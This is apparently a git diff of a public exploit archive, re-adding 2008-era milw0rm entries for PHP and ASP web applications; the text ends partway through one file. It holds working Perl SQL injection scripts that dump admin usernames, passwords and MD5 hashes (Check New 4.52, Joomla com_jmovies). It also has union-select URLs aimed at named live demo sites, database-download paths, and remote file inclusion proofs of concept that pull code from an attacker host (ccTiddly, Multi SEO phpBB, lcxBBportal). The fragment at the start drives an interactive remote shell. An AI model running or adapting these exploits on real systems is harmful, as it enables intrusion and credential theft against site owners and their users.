+	$req->header (User_Agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18');
+	$req->header (Accept => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5');
+	$req->header (Accept_Language => 'en-us,en;q=0.5');
+
+	
+	$response = $ua->request ($req);
+	$content = $response->content;
+
+	if ($content !~ /\#\#%\$\$%\#\#/) {
+		print ("Exploit Failed\n");
+		exit();
+	}
+
+	while ($content =~ /\#\#%\$\$%\#\#(.*?)\#\#%\$\$%\#\#/sg) {
+		print $1;
+	}
+
+	print "\n[cwh-shell]# ";
+	chomp ($cmd = <STDIN>);
+
+}
+
+# milw0rm.com [2008-12-02]
diff --git a/platforms/php/webapps/7323.txt b/platforms/php/webapps/7323.txt
index df6e13996..0606fdf2e 100755
--- a/platforms/php/webapps/7323.txt
+++ b/platforms/php/webapps/7323.txt
@@ -1,44 +1,44 @@
-#===========================================================
-#
-# SunByte e-Flower SQL Injection Attack by [W4RL0CK]
-#
-#===========================================================
-# 
-# VENDOR: Sunbyte  URL: http://www.sunbyte.net/
-# APP: Sunbyte e-Flower (eCommerce webapp)
-# APP SITE: http://www.sunbyte.net/products/index.php?screen=eflower
-# AUTHOR: W4RL0CK
-# DATE: 29/11/08
-# VULN.: SQL INJECTION
-#
-# 
-# WEBSITE: http://warlock.iblogger.org
-# CONTACT: w4rl0ck@hackermail.com
-#
-#===========================================================
-#
-# Expl0itin6:
-#
-# http://localhost/sunbyte/popupproduct.php?id=[uR eViLNeSS HeRe]
-#
-# Liv3 dEm0:
-#
-# http://www.sunbyte.net/florist/popupproduct.php?id=1337+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12
-#
-#
-#
-# now, use y0ur imaginati0n!  ;) 
-# note: there could be more vulnerabilities in the application
-#
-#===========================================================
-#
-# gr33tz t0 >>>>>>>>> CHIL34N T34M <<<<<<<<<<<<
-#  ===================================================
-# [ we ar3: Vicent0! ~ ThE.Xin0x ~ Par4d0gX ~ W4RL0CK ]
-#  ===================================================
-#
-#     and all m3mb3rs of: [MiTM.cL]       & str0ke
-#
-#===========================================================
-
-# milw0rm.com [2008-12-02]
+#===========================================================
+#
+# SunByte e-Flower SQL Injection Attack by [W4RL0CK]
+#
+#===========================================================
+# 
+# VENDOR: Sunbyte  URL: http://www.sunbyte.net/
+# APP: Sunbyte e-Flower (eCommerce webapp)
+# APP SITE: http://www.sunbyte.net/products/index.php?screen=eflower
+# AUTHOR: W4RL0CK
+# DATE: 29/11/08
+# VULN.: SQL INJECTION
+#
+# 
+# WEBSITE: http://warlock.iblogger.org
+# CONTACT: w4rl0ck@hackermail.com
+#
+#===========================================================
+#
+# Expl0itin6:
+#
+# http://localhost/sunbyte/popupproduct.php?id=[uR eViLNeSS HeRe]
+#
+# Liv3 dEm0:
+#
+# http://www.sunbyte.net/florist/popupproduct.php?id=1337+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12
+#
+#
+#
+# now, use y0ur imaginati0n!  ;) 
+# note: there could be more vulnerabilities in the application
+#
+#===========================================================
+#
+# gr33tz t0 >>>>>>>>> CHIL34N T34M <<<<<<<<<<<<
+#  ===================================================
+# [ we ar3: Vicent0! ~ ThE.Xin0x ~ Par4d0gX ~ W4RL0CK ]
+#  ===================================================
+#
+#     and all m3mb3rs of: [MiTM.cL]       & str0ke
+#
+#===========================================================
+
+# milw0rm.com [2008-12-02]
diff --git a/platforms/php/webapps/7324.txt b/platforms/php/webapps/7324.txt
index 33ad5afb8..02545a604 100755
--- a/platforms/php/webapps/7324.txt
+++ b/platforms/php/webapps/7324.txt
@@ -1,22 +1,22 @@
----------------------------------------------------------------------------
-
-Script Name: Rapid Classified
-
-Version: v3.1
-
-Google Dork: intext:©2003-2008 RC v3.1 Developed by: GA Soft
-
-Author: CoBRa_21
- 
-My Web Site: www.ipbul.org
-
----------------------------------------------------------------------------
- 
-Exploit:
- 
-http://localhost/[PATH]/db/cldb.mdb
- 
- 
----------------------------------------------------------------------------
-
-# milw0rm.com [2008-12-02]
+---------------------------------------------------------------------------
+
+Script Name: Rapid Classified
+
+Version: v3.1
+
+Google Dork: intext:©2003-2008 RC v3.1 Developed by: GA Soft
+
+Author: CoBRa_21
+ 
+My Web Site: www.ipbul.org
+
+---------------------------------------------------------------------------
+ 
+Exploit:
+ 
+http://localhost/[PATH]/db/cldb.mdb
+ 
+ 
+---------------------------------------------------------------------------
+
+# milw0rm.com [2008-12-02]
diff --git a/platforms/php/webapps/7328.pl b/platforms/php/webapps/7328.pl
index 0ced36a0a..aa8f5fb15 100755
--- a/platforms/php/webapps/7328.pl
+++ b/platforms/php/webapps/7328.pl
@@ -1,96 +1,96 @@
-#!/usr/bin/perl -w
-#=====================================================================
-# Check New 4.52 (findoffice.php search) Remote SQL Injection Exploit
-#=====================================================================
-#
-#  ,--^----------,--------,-----,-------^--,
-#  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
-#  `+---------------------------^----------|
-#    `\_,-------, _________________________|
-#      / XXXXXX /`|     /
-#     / XXXXXX /  `\   /
-#    / XXXXXX /\______(
-#   / XXXXXX /           
-#  / XXXXXX /
-# (________(             
-#  `------'
-#
-#AUTHOR : CWH Underground
-#DATE   : 3 December 2008
-#SITE   : cwh.citec.us
-#
-#
-#####################################################
-#APPLICATION : Check Up New Generation
-#VERSION     : 4.52
-#VENDOR	     : http://checkup.sourceforge.net/
-#DOWNLOAD    : http://downloads.sourceforge.net/checkup/checknew_4.52.zip
-######################################################
-#
-#Note: magic_quotes_gpc = off
-#
-#######################################################################################
-#Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
-#Special Thx : asylu3, str0ke, citec.us, milw0rm.com
-#######################################################################################
-
-
-use LWP::UserAgent;
-use HTTP::Request;
-
-my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); }
-
-if ($#ARGV+1 != 2)
-{
-   print "\n==============================================\n";
-   print "    Check New Remote SQL Injection Exploit   \n";
-   print "                                              \n";
-   print "        Discovered By CWH Underground         \n";
-   print "==============================================\n";
-   print "                                              \n";
-   print "  ,--^----------,--------,-----,-------^--,   \n";
-   print "  | |||||||||   `--------'     |          O	\n";
-   print "  `+---------------------------^----------|   \n";
-   print "    `\_,-------, _________________________|   \n";
-   print "      / XXXXXX /`|     /                      \n";
-   print "     / XXXXXX /  `\   /                       \n";
-   print "    / XXXXXX /\______(                        \n";
-   print "   / XXXXXX /                                 \n";
-   print "  / XXXXXX /   .. CWH Underground Hacking Team ..  \n";
-   print " (________(                                   \n";
-   print "  `------'                                    \n";
-   print "                                              \n"; 
-   print "Usage  : ./xpl.pl <URL to PATH> <Dump Limit>\n";
-   print "Example: ./xpl.pl http://www.target.com/checknew 10\n";
-   exit();
-}
-
-$target  = ($ARGV[0] =~ /^http:\/\//) ?  $ARGV[0]:  'http://' . $ARGV[0];
-$number = $ARGV[1];
-
-print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++";
-print "\n  ..:: SQL Injection Exploit By CWH Underground ::.. ";
-print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
-print "\n[+]Dump Username and Password\n";
-
-for ($start=0;$start<$number;$start++) {
-
-$xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
-$req = HTTP::Request->new(GET => $target."/findoffice.php?search=admin%%27%20and%201=2%20union%20select%201,concat(0x3a3a3a,Name,0x3a3a,Password,0x3a3a3a),3,4,5,6,7,8,9 from tbldoctor limit 1 offset ".$start."--+and+1=1&Submit=%A4%E9%B9%CB%D2")or die "Failed to Connect, Try again!\n";
-$res = $xpl->request($req);
-$info = $res->content;
-$count=$start+1;
-
-if ($info =~ /:::(.+):::/)
-{
-$dump=$1;
-($username,$password)= split('::',$dump);
-printf "\n [$count]\n [!]Username = $username \n [!]Password = $password\n";
-}
-else { 
-	print "\n [*]Exploit Done !!" or die "\n [*]Exploit Failed !!\n";
-	exit;
-}
-}
-
-# milw0rm.com [2008-12-03]
+#!/usr/bin/perl -w
+#=====================================================================
+# Check New 4.52 (findoffice.php search) Remote SQL Injection Exploit
+#=====================================================================
+#
+#  ,--^----------,--------,-----,-------^--,
+#  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
+#  `+---------------------------^----------|
+#    `\_,-------, _________________________|
+#      / XXXXXX /`|     /
+#     / XXXXXX /  `\   /
+#    / XXXXXX /\______(
+#   / XXXXXX /           
+#  / XXXXXX /
+# (________(             
+#  `------'
+#
+#AUTHOR : CWH Underground
+#DATE   : 3 December 2008
+#SITE   : cwh.citec.us
+#
+#
+#####################################################
+#APPLICATION : Check Up New Generation
+#VERSION     : 4.52
+#VENDOR	     : http://checkup.sourceforge.net/
+#DOWNLOAD    : http://downloads.sourceforge.net/checkup/checknew_4.52.zip
+######################################################
+#
+#Note: magic_quotes_gpc = off
+#
+#######################################################################################
+#Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
+#Special Thx : asylu3, str0ke, citec.us, milw0rm.com
+#######################################################################################
+
+
+use LWP::UserAgent;
+use HTTP::Request;
+
+my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); }
+
+if ($#ARGV+1 != 2)
+{
+   print "\n==============================================\n";
+   print "    Check New Remote SQL Injection Exploit   \n";
+   print "                                              \n";
+   print "        Discovered By CWH Underground         \n";
+   print "==============================================\n";
+   print "                                              \n";
+   print "  ,--^----------,--------,-----,-------^--,   \n";
+   print "  | |||||||||   `--------'     |          O	\n";
+   print "  `+---------------------------^----------|   \n";
+   print "    `\_,-------, _________________________|   \n";
+   print "      / XXXXXX /`|     /                      \n";
+   print "     / XXXXXX /  `\   /                       \n";
+   print "    / XXXXXX /\______(                        \n";
+   print "   / XXXXXX /                                 \n";
+   print "  / XXXXXX /   .. CWH Underground Hacking Team ..  \n";
+   print " (________(                                   \n";
+   print "  `------'                                    \n";
+   print "                                              \n"; 
+   print "Usage  : ./xpl.pl <URL to PATH> <Dump Limit>\n";
+   print "Example: ./xpl.pl http://www.target.com/checknew 10\n";
+   exit();
+}
+
+$target  = ($ARGV[0] =~ /^http:\/\//) ?  $ARGV[0]:  'http://' . $ARGV[0];
+$number = $ARGV[1];
+
+print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++";
+print "\n  ..:: SQL Injection Exploit By CWH Underground ::.. ";
+print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
+print "\n[+]Dump Username and Password\n";
+
+for ($start=0;$start<$number;$start++) {
+
+$xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
+$req = HTTP::Request->new(GET => $target."/findoffice.php?search=admin%%27%20and%201=2%20union%20select%201,concat(0x3a3a3a,Name,0x3a3a,Password,0x3a3a3a),3,4,5,6,7,8,9 from tbldoctor limit 1 offset ".$start."--+and+1=1&Submit=%A4%E9%B9%CB%D2")or die "Failed to Connect, Try again!\n";
+$res = $xpl->request($req);
+$info = $res->content;
+$count=$start+1;
+
+if ($info =~ /:::(.+):::/)
+{
+$dump=$1;
+($username,$password)= split('::',$dump);
+printf "\n [$count]\n [!]Username = $username \n [!]Password = $password\n";
+}
+else { 
+	print "\n [*]Exploit Done !!" or die "\n [*]Exploit Failed !!\n";
+	exit;
+}
+}
+
+# milw0rm.com [2008-12-03]
diff --git a/platforms/php/webapps/7331.pl b/platforms/php/webapps/7331.pl
index 38fb52db1..68c937cb8 100755
--- a/platforms/php/webapps/7331.pl
+++ b/platforms/php/webapps/7331.pl
@@ -1,65 +1,65 @@
-#!/usr/bin/perl -w
-# -----------------------------------------------------------
-# Joomla Component com_jmovies 1.1 (id) SQL Injection Exploit
-# by s3rg3770 with athos :)
-# demo http://www.disneyrama.com
-# -----------------------------------------------------------
-# Note: In lulz we trust :O
-# -----------------------------------------------------------
-
-use strict;
-use LWP::UserAgent;
-use LWP::Simple;
-
-
-my $host = shift;
-my $myid = shift or &help;
-
-my $path = "/index.php?option=com_jmovies&Itemid=29&task=detail&id=-1+".
-           "union+select+1,concat(0x215F,username,0x3a,password,0x215F)+".
-           "from+jos_users+where+id=${myid}--";
-
-my $http = new LWP::UserAgent(
-                               agent   => 'Mozilla/4.5 [en] (Win95; U)',
-                               timeout => '5',
-                             );  
-
-
-my $response = $http->get($host.$path); 
-
-if($response->content =~ /!_(.+?)!_/i)
-{
-     print STDOUT "Hash MD5: $1\n";
-     print STDOUT "Password: ".search_md5($1)."\n";
-     exit;
-}
-else
-{
-     print STDOUT "Exploit Failed!\n";
-     exit;
-}
-
-
-
-sub search_md5
-{
-     my $hash = shift @_;
-     my $cont = undef;
-
-     $cont = get('http://md5.rednoize.com/?p&s=md5&q='.$hash);
-        
-     if(length($hash) < 32 && !is_error($cont))
-     {
-          return $cont;
-     }
-}   
-
-
-sub help
-{
-     print STDOUT "Usage: perl $0 [host] [user ID]\n";
-     print STDOUT "by athos - staker[at]hotmail[dot]it\n";
-     exit;
-}
-
-# milw0rm.com [2008-12-03]
+#!/usr/bin/perl -w
+# -----------------------------------------------------------
+# Joomla Component com_jmovies 1.1 (id) SQL Injection Exploit
+# by s3rg3770 with athos :)
+# demo http://www.disneyrama.com
+# -----------------------------------------------------------
+# Note: In lulz we trust :O
+# -----------------------------------------------------------
+
+use strict;
+use LWP::UserAgent;
+use LWP::Simple;
+
+
+my $host = shift;
+my $myid = shift or &help;
+
+my $path = "/index.php?option=com_jmovies&Itemid=29&task=detail&id=-1+".
+           "union+select+1,concat(0x215F,username,0x3a,password,0x215F)+".
+           "from+jos_users+where+id=${myid}--";
+
+my $http = new LWP::UserAgent(
+                               agent   => 'Mozilla/4.5 [en] (Win95; U)',
+                               timeout => '5',
+                             );  
+
+
+my $response = $http->get($host.$path); 
+
+if($response->content =~ /!_(.+?)!_/i)
+{
+     print STDOUT "Hash MD5: $1\n";
+     print STDOUT "Password: ".search_md5($1)."\n";
+     exit;
+}
+else
+{
+     print STDOUT "Exploit Failed!\n";
+     exit;
+}
+
+
+
+sub search_md5
+{
+     my $hash = shift @_;
+     my $cont = undef;
+
+     $cont = get('http://md5.rednoize.com/?p&s=md5&q='.$hash);
+        
+     if(length($hash) < 32 && !is_error($cont))
+     {
+          return $cont;
+     }
+}   
+
+
+sub help
+{
+     print STDOUT "Usage: perl $0 [host] [user ID]\n";
+     print STDOUT "by athos - staker[at]hotmail[dot]it\n";
+     exit;
+}
+
+# milw0rm.com [2008-12-03]
diff --git a/platforms/php/webapps/7332.txt b/platforms/php/webapps/7332.txt
index 459000147..06111fef7 100755
--- a/platforms/php/webapps/7332.txt
+++ b/platforms/php/webapps/7332.txt
@@ -1,35 +1,35 @@
-###########################################################################
-#-----------------------------OffensiveTrack------------------------------#
-###########################################################################
-
-
-
----------------------------- Tunisia Muslim ------------------------------
-
-
-#found by : OffensiveTrack
-#Author   : AlpHaNiX
-#website  : www.offensivetrack.org
-
-
-#contact  : AlpHa[AT]HACKER[DOT]BZ
-
-
-###########################################################################
-
-#script   : ASP User Engine .NET
-#download : http://shop.robs-projects.com/UE_DotNET.html
-
-
-
-
-
-#Exploit :
-http://target.com/users.mdb
-
-
-#special thanks for the dear DexTer for his help :$
-
-###########################################################################
-
-# milw0rm.com [2008-12-03]
+###########################################################################
+#-----------------------------OffensiveTrack------------------------------#
+###########################################################################
+
+
+
+---------------------------- Tunisia Muslim ------------------------------
+
+
+#found by : OffensiveTrack
+#Author   : AlpHaNiX
+#website  : www.offensivetrack.org
+
+
+#contact  : AlpHa[AT]HACKER[DOT]BZ
+
+
+###########################################################################
+
+#script   : ASP User Engine .NET
+#download : http://shop.robs-projects.com/UE_DotNET.html
+
+
+
+
+
+#Exploit :
+http://target.com/users.mdb
+
+
+#special thanks for the dear DexTer for his help :$
+
+###########################################################################
+
+# milw0rm.com [2008-12-03]
diff --git a/platforms/php/webapps/7335.txt b/platforms/php/webapps/7335.txt
index 547b13421..5cc0a5da9 100755
--- a/platforms/php/webapps/7335.txt
+++ b/platforms/php/webapps/7335.txt
@@ -1,50 +1,50 @@
-==========================================================================
-
-
-  [o] Multi SEO phpBB 1.1.0 Remote File Inclusion Vulnerability
-
-       Software : Multi SEO phpBB version 1.1.0
-
-       Vendor   : http://www.phpbb-seo.de/
-
-       Download : http://www.phpbb-seo.de/downloads/multi.html
-
-       Author   : NoGe
-       Contact  : noge[dot]code[at]gmail[dot]com
-       Blog     : http://evilc0de.blogspot.com
-
-
-==========================================================================
-
-
-  [o] Vulnerable file
-
-
-       include/global.php
-
-
-        include_once ($pfad . 'include/config.php');
-
-
-
-  [o] Exploit
-
-       http://localhost/[path]/include/global.php?pfad=[evilcode]
-
-
-==========================================================================
-
-
-  [o] Greetz
-
-       MainHack BrotherHood [ http://mainhack.com/]
-       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
-       H312Y yooogy mousekill }^-^{ kaka11 martfella
-       skulmatic olibekas ulga Cungkee k1tk4t str0ke
-
-       GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ]
-
-        
-==========================================================================
-
-# milw0rm.com [2008-12-03]
+==========================================================================
+
+
+  [o] Multi SEO phpBB 1.1.0 Remote File Inclusion Vulnerability
+
+       Software : Multi SEO phpBB version 1.1.0
+
+       Vendor   : http://www.phpbb-seo.de/
+
+       Download : http://www.phpbb-seo.de/downloads/multi.html
+
+       Author   : NoGe
+       Contact  : noge[dot]code[at]gmail[dot]com
+       Blog     : http://evilc0de.blogspot.com
+
+
+==========================================================================
+
+
+  [o] Vulnerable file
+
+
+       include/global.php
+
+
+        include_once ($pfad . 'include/config.php');
+
+
+
+  [o] Exploit
+
+       http://localhost/[path]/include/global.php?pfad=[evilcode]
+
+
+==========================================================================
+
+
+  [o] Greetz
+
+       MainHack BrotherHood [ http://mainhack.com/]
+       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
+       H312Y yooogy mousekill }^-^{ kaka11 martfella
+       skulmatic olibekas ulga Cungkee k1tk4t str0ke
+
+       GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ]
+
+        
+==========================================================================
+
+# milw0rm.com [2008-12-03]
diff --git a/platforms/php/webapps/7336.txt b/platforms/php/webapps/7336.txt
index 6309cb62e..ec57053d4 100755
--- a/platforms/php/webapps/7336.txt
+++ b/platforms/php/webapps/7336.txt
@@ -1,96 +1,95 @@
-
-/*
-
-	$Id: cctiddly-1.7.4-rfi.txt,v 0.1 2008/12/04 04:12:20 cOndemned Exp $
-
-	ccTiddly 1.7.4 (cct_base) Multiple Remote File Inclusion Vulnerabilities
-	found by cOndemned
-	
-	download from : http://tiddlywiki.org/ccTiddly/ccTiddly_v1.7.4.zip
-	
-	Probably prior versions are vulnerable too...
-
-	Greetz: ZaBeaTy, str0ke, TBH, Avantura
-
-*/
-
-
-0x01 :
-	file : 
-		/index.php
-	poc : 
-		http://[host]/[cctiddly_path]/index.php?cct_base=http://[attacker]/evil.txt?
-	source :  
-
-		18.	//includes
-		19.	if(!isset($cct_base))
-		20.		$cct_base = "";
-		21.
-		22.	include_once($cct_base."includes/header.php");
-		23.	include_once($cct_base."includes/login.php");	
-	
-0x02 :
-
-	file :
-		/handle/proxy.php
-	poc :
-		http://[host]/[cctiddly_path]/handle/proxy.php?cct_base=http://[attacker]/evil.txt?
-	source :
-
-		3.	if(!isset($cct_base)) 
-		4.		$cct_base= "../";
-		5.	include_once($cct_base."includes/header.php");
-		6.	include_once($cct_base."includes/config.php");
-
-0x03 :
-
-	file :
-		/includes/header.php
-	poc :
-		http://[host]/[cctiddly_path]/handle/includes/header.php?cct_base=http://[attacker]/evil.txt?
-	source :
-
-		5.	if(!isset($cct_base)) 
-		6.		$cct_base= "";
-		7.	include_once($cct_base."includes/functions.php");
-		8.	include_once($cct_base."includes/config.php");
-		9.	include_once($cct_base."includes/pluginLoader.php");
-		10.	include_once($cct_base."lang/".$tiddlyCfg['pref']['language']."/language.php");
-		11.	//include is used because language file is included once in config.php file
-		12.	include_once($cct_base."includes/tiddler.php");
-		13.	include_once($cct_base."includes/user.php");
-
-0x04 :
-
-	file :
-		/includes/include.php
-	poc :
-		http://[host]/[cctiddly_path]/includes/include.php?cct_base=http://[attacker]/evil.txt?
-	source :
-
-		3.	include_once($cct_base."includes/ccAssignments.php");
-
-0x05 :
-
-	file :
-		/includes/workspace.php	
-	poc :
-		http://[host]/[cctiddly_path]/includes/workspace.php?cct_base=http://[attacker]/evil.txt?
-	source :
-		3.	include_once($cct_base."includes/header.php");
-		4.	include_once($cct_base."includes/user.php");
-		5.	include_once($cct_base."includes/tiddler.php");
-
-0x06 :
-
-	file :
-		/plugins/RSS/files/rss.php
-	poc :
-		http://[host]/[cctiddly_path]/plugins/RSS/files/rss.php?cct_base=http://[attacker]/evil.txt?
-	source :
-
-		3.	include_once($cct_base."includes/header.php");
-		
-EoF.
-
-# milw0rm.com [2008-12-04]
+/*
+
+	$Id: cctiddly-1.7.4-rfi.txt,v 0.1 2008/12/04 04:12:20 cOndemned Exp $
+
+	ccTiddly 1.7.4 (cct_base) Multiple Remote File Inclusion Vulnerabilities
+	found by cOndemned
+	
+	download from : http://tiddlywiki.org/ccTiddly/ccTiddly_v1.7.4.zip
+	
+	Probably prior versions are vulnerable too...
+
+	Greetz: ZaBeaTy, str0ke, TBH, Avantura
+
+*/
+
+
+0x01 :
+	file : 
+		/index.php
+	poc : 
+		http://[host]/[cctiddly_path]/index.php?cct_base=http://[attacker]/evil.txt?
+	source :  
+
+		18.	//includes
+		19.	if(!isset($cct_base))
+		20.		$cct_base = "";
+		21.
+		22.	include_once($cct_base."includes/header.php");
+		23.	include_once($cct_base."includes/login.php");	
+	
+0x02 :
+
+	file :
+		/handle/proxy.php
+	poc :
+		http://[host]/[cctiddly_path]/handle/proxy.php?cct_base=http://[attacker]/evil.txt?
+	source :
+
+		3.	if(!isset($cct_base)) 
+		4.		$cct_base= "../";
+		5.	include_once($cct_base."includes/header.php");
+		6.	include_once($cct_base."includes/config.php");
+
+0x03 :
+
+	file :
+		/includes/header.php
+	poc :
+		http://[host]/[cctiddly_path]/handle/includes/header.php?cct_base=http://[attacker]/evil.txt?
+	source :
+
+		5.	if(!isset($cct_base)) 
+		6.		$cct_base= "";
+		7.	include_once($cct_base."includes/functions.php");
+		8.	include_once($cct_base."includes/config.php");
+		9.	include_once($cct_base."includes/pluginLoader.php");
+		10.	include_once($cct_base."lang/".$tiddlyCfg['pref']['language']."/language.php");
+		11.	//include is used because language file is included once in config.php file
+		12.	include_once($cct_base."includes/tiddler.php");
+		13.	include_once($cct_base."includes/user.php");
+
+0x04 :
+
+	file :
+		/includes/include.php
+	poc :
+		http://[host]/[cctiddly_path]/includes/include.php?cct_base=http://[attacker]/evil.txt?
+	source :
+
+		3.	include_once($cct_base."includes/ccAssignments.php");
+
+0x05 :
+
+	file :
+		/includes/workspace.php	
+	poc :
+		http://[host]/[cctiddly_path]/includes/workspace.php?cct_base=http://[attacker]/evil.txt?
+	source :
+		3.	include_once($cct_base."includes/header.php");
+		4.	include_once($cct_base."includes/user.php");
+		5.	include_once($cct_base."includes/tiddler.php");
+
+0x06 :
+
+	file :
+		/plugins/RSS/files/rss.php
+	poc :
+		http://[host]/[cctiddly_path]/plugins/RSS/files/rss.php?cct_base=http://[attacker]/evil.txt?
+	source :
+
+		3.	include_once($cct_base."includes/header.php");
+		
+EoF.
+
+# milw0rm.com [2008-12-04]
diff --git a/platforms/php/webapps/7338.txt b/platforms/php/webapps/7338.txt
index 607dcf54c..41d641952 100755
--- a/platforms/php/webapps/7338.txt
+++ b/platforms/php/webapps/7338.txt
@@ -1,35 +1,35 @@
-###########################################################################
-#-----------------------------OffensiveTrack------------------------------#
-###########################################################################
-
-
-
-
----------------------------- Tunisia Muslim ------------------------------
-
-
-#found by : OffensiveTrack
-#Author   : AlpHaNiX
-#website  : www.offensivetrack.org
-
-
-
-#contact  : AlpHa[AT]HACKER[DOT]BZ
-
-
-###########################################################################
-
-#script   : User Engine ASP Lite 
-#download : http://www.robs-projects.com/Apps/Download/download.aspx?file=ASP_UELite
-
-
-
-#Exploit :
-http://target.com/users.mdb
-
-
-#special thanks for syst3m and crimeirc staff
-
-###########################################################################
-
-# milw0rm.com [2008-12-04]
+###########################################################################
+#-----------------------------OffensiveTrack------------------------------#
+###########################################################################
+
+
+
+
+---------------------------- Tunisia Muslim ------------------------------
+
+
+#found by : OffensiveTrack
+#Author   : AlpHaNiX
+#website  : www.offensivetrack.org
+
+
+
+#contact  : AlpHa[AT]HACKER[DOT]BZ
+
+
+###########################################################################
+
+#script   : User Engine ASP Lite 
+#download : http://www.robs-projects.com/Apps/Download/download.aspx?file=ASP_UELite
+
+
+
+#Exploit :
+http://target.com/users.mdb
+
+
+#special thanks for syst3m and crimeirc staff
+
+###########################################################################
+
+# milw0rm.com [2008-12-04]
diff --git a/platforms/php/webapps/7339.txt b/platforms/php/webapps/7339.txt
index dbda1a5ad..31e17b367 100755
--- a/platforms/php/webapps/7339.txt
+++ b/platforms/php/webapps/7339.txt
@@ -1,29 +1,29 @@
-[~] ASP Template Creature DD/SQL Multiple Remote Vuln.
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~] -----------------------------------------------------------
-
-
-exp for demo: ( DD )
-
-http://demo.merlix.com/templatecreature/workDB/templatemonster.mdb
-
-exp for demo: ( sql inj )
-
-user: http://demo.merlix.com/templatecreature/media/media_level.asp?mcatid=999999+union+select+1,vcUserName,3+from+tb_adminUser
-
-pass: http://demo.merlix.com/templatecreature/media/media_level.asp?mcatid=999999+union+select+1,vcPassword,3+from+tb_adminUser
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke 
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-12-04]
+[~] ASP Template Creature DD/SQL Multiple Remote Vuln.
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~] -----------------------------------------------------------
+
+
+exp for demo: ( DD )
+
+http://demo.merlix.com/templatecreature/workDB/templatemonster.mdb
+
+exp for demo: ( sql inj )
+
+user: http://demo.merlix.com/templatecreature/media/media_level.asp?mcatid=999999+union+select+1,vcUserName,3+from+tb_adminUser
+
+pass: http://demo.merlix.com/templatecreature/media/media_level.asp?mcatid=999999+union+select+1,vcPassword,3+from+tb_adminUser
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke 
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-12-04]
diff --git a/platforms/php/webapps/7341.txt b/platforms/php/webapps/7341.txt
index 323331cd6..02e090747 100755
--- a/platforms/php/webapps/7341.txt
+++ b/platforms/php/webapps/7341.txt
@@ -1,53 +1,53 @@
-=============================================================================================================
-
-
-  [o] lcxBBportal 0.1 Alpha 2 Remote File Inclusion Vulnerability
-
-       Software : lcxBBportal version 0.1 Alpha 2
-       Vendor   : http://code.google.com/p/lcxbbportal/
-       Download : http://code.google.com/p/lcxbbportal/downloads/list/lcxbbportal-0.1.A2.tar.gz
-       Author   : NoGe
-       Contact  : noge[dot]code[at]gmail[dot]com
-       Blog     : http://evilc0de.blogspot.com
-
-
-=============================================================================================================
-
-
-  [o] Vulnerable file
-
-       portal/includes/portal_block.php
-
-	include($phpbb_root_path . 'includes/bbcode.' . $phpEx);
-
-       includes/acp/acp_lcxbbportal.php
-
-	$phpbb_portal_path = $phpbb_root_path . 'portal/';
-	require_once($phpbb_portal_path . 'includes/portal_block.' . $phpEx);
-	require_once($phpbb_portal_path . 'includes/adm_portal_block.' . $phpEx);
-	include($phpbb_root_path . 'includes/functions_display.' . $phpEx);
-
-
-
-  [o] Exploit
-
-       http://localhost/[path]/portal/includes/portal_block.php?phpbb_root_path=[evilcode]
-       http://localhost/[path]/includes/acp/acp_lcxbbportal.php?phpbb_root_path=[evilcode]
-
-
-=============================================================================================================
-
-
-  [o] Greetz
-
-       MainHack BrotherHood [ http://serverisdown.org/blog/]
-       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
-       H312Y yooogy mousekill }^-^{ kaka11 martfella
-       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
-
-       GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ]
-
-        
-=============================================================================================================
-
-# milw0rm.com [2008-12-04]
+=============================================================================================================
+
+
+  [o] lcxBBportal 0.1 Alpha 2 Remote File Inclusion Vulnerability
+
+       Software : lcxBBportal version 0.1 Alpha 2
+       Vendor   : http://code.google.com/p/lcxbbportal/
+       Download : http://code.google.com/p/lcxbbportal/downloads/list/lcxbbportal-0.1.A2.tar.gz
+       Author   : NoGe
+       Contact  : noge[dot]code[at]gmail[dot]com
+       Blog     : http://evilc0de.blogspot.com
+
+
+=============================================================================================================
+
+
+  [o] Vulnerable file
+
+       portal/includes/portal_block.php
+
+	include($phpbb_root_path . 'includes/bbcode.' . $phpEx);
+
+       includes/acp/acp_lcxbbportal.php
+
+	$phpbb_portal_path = $phpbb_root_path . 'portal/';
+	require_once($phpbb_portal_path . 'includes/portal_block.' . $phpEx);
